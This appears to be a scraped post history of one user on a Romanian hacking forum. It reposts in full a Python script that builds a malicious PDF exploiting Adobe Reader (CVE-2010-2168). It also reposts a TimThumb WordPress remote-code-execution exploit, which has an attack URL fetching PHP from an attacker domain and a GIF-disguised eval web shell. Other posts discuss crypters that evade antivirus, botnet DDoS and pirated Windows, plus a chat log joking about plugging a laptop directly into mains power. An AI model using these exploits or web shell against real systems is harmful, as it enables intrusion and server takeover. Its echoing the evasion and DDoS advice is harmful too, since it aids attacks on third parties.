Gabriel87

Format C: si ai scapat de virus

Father Crypter

File Info Report date: 2011-08-16 19:42:29 (GMT 1) File name: lfi-scanner-exe File size: 693248 bytes MD5 Hash: d422ea86a771ef02af7fea1c87ca1422 SHA1 Hash: 6dc2254533f11f2b9421a28efddb00928f1d0f54 Detection rate: 0 on 5 (0%) Status: CLEAN Detections AVG - Avira AntiVir - ClamAV - Emsisoft - TrendMicro - Scan report generated by NoVirusThanks.org E curat

E clean ? l-a verificat cineva Edit : Ok , multumesc gigaevil merge perfect

@FearDotCom , fara suparare nu am nimic cu tine dar tu cum te numesti atunci ? http://rstcenter.com/forum/34726-feardotcom-aka-smenaru4u-baiatul-bagat-frica-userii-rst.rst

Si mie imi trebuie script-ul ala ca nici mie nu imi merge sa scanez ca am net prin RDS.. si tutorialul lui nedo e sters de pe forum

Super melodia \m/

Si eu is de acord cu idee asta o sa fie dupaia altfel forumul RST

La multi ani !

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/ http://www.exploit.db.com/sploits/moaub-23-exploit.zip ''' ''' Title : Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability Version : Adobe Reader 9.3.2 Analysis : http://www.abysssec.com Vendor : http://www.adobe.com Impact : Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-2168 MOAUB Number : MOAUB-06 ''' import sys class PDF: def __init__(self): self.xrefs = [] self.eol = '\x0a' self.content = '' self.xrefs_offset = 0 def header(self): self.content += '%PDF-1.6' + self.eol def obj(self, obj_num, data,flag): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num if flag == 1: self.content += self.eol + '<< ' + data + ' >>' + self.eol else: self.content += self.eol + data + self.eol self.content += 'endobj' + self.eol def obj_SWFStream(self, obj_num, data, stream): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream)) self.content += ' >>' + self.eol self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol self.content += 'endobj' + self.eol def obj_Stream(self, obj_num, data, stream): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num self.content += self.eol + '<< ' + data + '/Length %d' %len(stream) self.content += ' >>' + self.eol self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol self.content += 'endobj' + self.eol def ref(self, ref_num): return '%d 0 R' % ref_num def xref(self): self.xrefs_offset = len(self.content) self.content += 'xref' + self.eol self.content += '0 %d' % (len(self.xrefs) + 1) self.content += self.eol self.content += '0000000000 65535 f' + self.eol for i in self.xrefs: self.content += '%010d 00000 n' % i self.content += self.eol def trailer(self): self.content += 'trailer' + self.eol self.content += '<< /Size %d' % (len(self.xrefs) + 1) self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol self.content += 'startxref' + self.eol self.content += '%d' % self.xrefs_offset self.content += self.eol self.content += '%%EOF' def generate(self): return self.content class POC: def getSWF(self): try: fdR = open('flash.swf', 'rb+') strTotal = fdR.read() str1 = strTotal[:3673] command = '\x40\xE8\xD4\xF1\xFF\x33' #newfunction str2 = strTotal[3679:] fdW= open('poc.swf', 'wb+') finalStr = str1+command+str2 fdW.write(finalStr) fdR.close() return finalStr except IOError: print '[*] Error : An IO error has occurred' def generate_pdf(): poc = POC() swfFile = 'poc.swf' pdf = PDF() pdf.header() pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1) pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1) pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1) pdf.obj_Stream(4, '','') pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1) pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1) pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1) pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',poc.getSWF() ) pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1) pdf.obj_Stream(16, '<</Length 0 >> ','') pdf.xref() pdf.trailer() return pdf.generate() def main(): if len(sys.argv) != 2: print 'Usage: python %s [output file name]' % sys.argv[0] sys.exit(0) file_name = sys.argv[1] if not file_name.endswith('.pdf'): file_name = file_name + '.pdf' try: fd = open(file_name, 'wb+') fd.write(generate_pdf()) fd.close() print '[-] PDF file generated and written to %s' % file_name except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main() Sursa : MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability

# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin - Remote Code Execution Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.) (Version 1.33 did not save the cache file as .php) Info: (See references for original advisory) TimThumb is an image resizing utility, widely used in many WordPress themes. External Links: http://www.binarymoon.co.uk/projects/timthumb/ http://code.google.com/p/timthumb/ Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer) -:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory. Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.) http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php Stored file on the Target: (This can change from host to host.) 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format. Proof of Concept File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 (Transparent GIF + <?php @eval($_GET['cmd']) ?> -:: Solution ::- Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011 References: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/ http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif Sursa : Exploits Database by Offensive Security

Nu e vulnerabil site`ul de aia nu ti`o gasit

Cartus , cand is liber si eu si nu lucrez nu te vad online sa facem ala

Stai tu linistit ca nu folosesc aia asa ceva " LOIC " pentru ddos sau DOS si nici nu cred ca folosesc metoda ddos si daca folosesc au botnet destul de mare nu dau cu programe free de pe net iti spun ca ai auzit prost

Pentru romanii era de 8 euro Fly-Crypter dar asa cred ca o sa fie si asta pentru romanii

Pai atunci iti faci boti intr-un botnet pe irc si dai din botnet DDos nu iti faci 500-600 boti si dai cu asta

@Exc3lent , tu vezi de cand e postul ? " 12-15-2009 " si tu te-ai trezit acuma sa zici ca nu merge link-ul de download

cristi_ro: cum alimentez laptop-ul? direct din priza.? PAPU: da PAPU: tai mufa de la transformator belesti firele si le bagi in priza cristi_ro: pai aici zice de 12 volt PAPU: e vrajala ma daca bagi direct la priza merge mai repede cristi_ro: k cristi_ro: asteapta PAPU: baaaaaaaaaaaaaaaaaaaaaaaaaa am glumit tampitule nu baga PAPU: baaaaaaaaaaaaaaaaaaaaaaaaaa am glumit tampitule nu baga cristi_ro: BAAAAAAAAAAAAAAAAAAA A IESIT FUM DIN EL CE MORTII MATII MIAI FACUT cristi_ro: BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA cristi_ro: BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA cristi_ro: ba cretinule nu era al meu dobitocule ce mortii matii ma fac acum este negru tot PAPU: ahhahahahahahahahhhhhhhhhhhhhhahahahahahahahahhaha killthemf: uite asa io trag lu ma-ta killthemf: http://i46.tinypic.com/117tqub.jpg Diriga: ceeeeeeeeeee??????? killthemf: au sa-mi bag ... Diriga: ce inseamna aia ? killthemf: doamna scuze n-am vrut sa va arat dumneavoastra Diriga: 1 ai la purtare , 1 !!!!!!!!!!!!!!!!!!!!! killthemf: scuze doamna , asa se intampla pe mess , vroiam sa ii arat lu marius cum sta treaba intre mine si maicasa Diriga: ok o sun eu acum sa ii spun !!!!! killthemf: datimi si mie numaru ei Diriga: nesimtitule !!! killthemf: hahahahha =))

Ti-am dat PM

Windows XP SP2 ( il folosesc pe virtualbox ) = piratat Windows 7 32bit = piratat

@sandbot , deschide-l in virtualbox

Script-ul functioneaza foarte bine daca ai banda mare de net daca nu ai am mai spus pici tu mai repede decat victima deci daca nu ai banda destula nu are rost sa dati cu el

se sterg print-urile dupa ceva timp pe tinypic , dar am vorbit acuma cateva zile cu BUNNN si mi-a zis ca in 2 zile e gata